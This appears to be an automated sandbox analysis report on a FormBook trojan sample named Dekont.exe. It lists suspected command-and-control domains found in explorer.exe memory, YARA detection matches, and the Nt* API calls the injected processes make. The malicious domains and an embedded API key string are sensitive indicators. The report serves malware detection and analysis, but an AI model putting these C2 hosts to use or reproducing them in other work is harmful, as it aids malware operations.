          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eals.latReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ebshieldsrenew.live
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ebshieldsrenew.live/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ebshieldsrenew.live/bc01/www.oko.events
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ebshieldsrenew.liveReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eddogbrands.website
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eddogbrands.website/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eddogbrands.website/bc01/www.lkjuy.xyz
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eddogbrands.websiteReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hildrens-clothing.today
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hildrens-clothing.today/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hildrens-clothing.today/bc01/www.olocaustaffirmer.net
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hildrens-clothing.todayReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inancialenlightment.info
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inancialenlightment.info/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inancialenlightment.info/bc01/www.omotech-dz.net
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inancialenlightment.infoReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lkjuy.xyz
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lkjuy.xyz/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lkjuy.xyz/bc01/www.inancialenlightment.info
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lkjuy.xyzReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lussalesapp.website
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lussalesapp.website/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lussalesapp.website/bc01/www.48xc300mw.autos
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lussalesapp.websiteReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nnevateknoloji.xyz
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nnevateknoloji.xyz/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nnevateknoloji.xyz/bc01/www.eddogbrands.website
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nnevateknoloji.xyzReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events/bc01/www.hildrens-clothing.today
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.eventsReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olocaustaffirmer.net
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olocaustaffirmer.net/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olocaustaffirmer.net/bc01/www.eals.lat
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.olocaustaffirmer.netReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.omotech-dz.net
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.omotech-dz.net/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.omotech-dz.net/bc01/www.y-language-menu.net
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.omotech-dz.netReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qzxx.top
          Source: explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qzxx.top/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qzxx.topReferer:
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y-language-menu.net
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y-language-menu.net/bc01/
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y-language-menu.net/bc01/www.ebshieldsrenew.live
          Source: explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.y-language-menu.netReferer:
          Source: explorer.exe, 00000006.00000002.4536578423.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2094235679.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000006.00000002.4522541380.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3850951608.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2086309850.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3096651186.00000000076F8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000006.00000002.4530151836.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000006.00000002.4522128986.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2086309850.0000000007637000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000006.00000002.4520271169.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2078823986.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3095758909.00000000035FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.coml
          Source: explorer.exe, 00000006.00000000.2089618463.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3854649429.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4533610517.0000000009C22000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000006.00000000.2089618463.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3849680268.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4533709469.0000000009C96000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000006.00000002.4536578423.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2094235679.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000006.00000000.2089618463.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
          Source: explorer.exe, 00000006.00000000.2089618463.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Dekont.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2142589404.0000000000EDF000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2141729519.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4518032619.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4518870753.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.4518634583.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.4538701995.000000000E768000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Diceloader_15eeb7b9 Author: unknown
          Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.2071931246.0000000003929000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Dekont.exe PID: 1816, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: Dekont.exe PID: 5624, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: control.exe PID: 1292, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041A330 NtCreateFile,5_2_0041A330
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041A3E0 NtReadFile,5_2_0041A3E0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041A460 NtClose,5_2_0041A460
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041A510 NtAllocateVirtualMemory,5_2_0041A510
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041A3DB NtReadFile,5_2_0041A3DB
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_0041A50F NtAllocateVirtualMemory,5_2_0041A50F
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012B60 NtClose,LdrInitializeThunk,5_2_01012B60
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_01012BF0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012AD0 NtReadFile,LdrInitializeThunk,5_2_01012AD0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012D10 NtMapViewOfSection,LdrInitializeThunk,5_2_01012D10
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_01012D30
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012DD0 NtDelayExecution,LdrInitializeThunk,5_2_01012DD0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01012DF0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01012C70
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_01012CA0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012F30 NtCreateSection,LdrInitializeThunk,5_2_01012F30
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012F90 NtProtectVirtualMemory,LdrInitializeThunk,5_2_01012F90
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012FB0 NtResumeThread,LdrInitializeThunk,5_2_01012FB0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012FE0 NtCreateFile,LdrInitializeThunk,5_2_01012FE0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_01012E80
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_01012EA0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01014340 NtSetContextThread,5_2_01014340
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01014650 NtSuspendThread,5_2_01014650
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012B80 NtQueryInformationFile,5_2_01012B80
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012BA0 NtEnumerateValueKey,5_2_01012BA0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012BE0 NtQueryValueKey,5_2_01012BE0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012AB0 NtWaitForSingleObject,5_2_01012AB0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012AF0 NtWriteFile,5_2_01012AF0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012D00 NtSetInformationFile,5_2_01012D00
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012DB0 NtEnumerateKey,5_2_01012DB0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012C00 NtQueryInformationProcess,5_2_01012C00
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012C60 NtCreateKey,5_2_01012C60
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012CC0 NtQueryVirtualMemory,5_2_01012CC0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012CF0 NtOpenProcess,5_2_01012CF0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012F60 NtCreateProcessEx,5_2_01012F60
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012FA0 NtQuerySection,5_2_01012FA0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012E30 NtWriteVirtualMemory,5_2_01012E30
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01012EE0 NtQueueApcThread,5_2_01012EE0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01013010 NtOpenDirectoryObject,5_2_01013010
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01013090 NtSetValueKey,5_2_01013090
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010135C0 NtCreateMutant,5_2_010135C0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_010139B0 NtGetContextThread,5_2_010139B0
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01013D10 NtOpenProcessToken,5_2_01013D10
          Source: C:\Users\user\Desktop\Dekont.exeCode function: 5_2_01013D70 NtOpenThread,5_2_01013D70
          Source: C:\Windows\explorer.exeCode function: 6_2_0E750232 NtCreateFile,6_2_0E750232
          Source: C:\Windows\explorer.exeCode function: 6_2_0E751E12 NtProtectVirtualMemory,6_2_0E751E12
          Source: C:\Windows\explorer.exeCode function: 6_2_0E751E0A NtProtectVirtualMemory,6_2_0E751E0A
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_04D82CA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_04D82C70
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82C60 NtCreateKey,LdrInitializeThunk,8_2_04D82C60
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82DD0 NtDelayExecution,LdrInitializeThunk,8_2_04D82DD0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_04D82DF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82D10 NtMapViewOfSection,LdrInitializeThunk,8_2_04D82D10
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,8_2_04D82EA0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82FE0 NtCreateFile,LdrInitializeThunk,8_2_04D82FE0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82F30 NtCreateSection,LdrInitializeThunk,8_2_04D82F30
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82AD0 NtReadFile,LdrInitializeThunk,8_2_04D82AD0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_04D82BF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04D82BE0 NtQueryValueKey,LdrInitializeThunk,8_2_04D82BE0
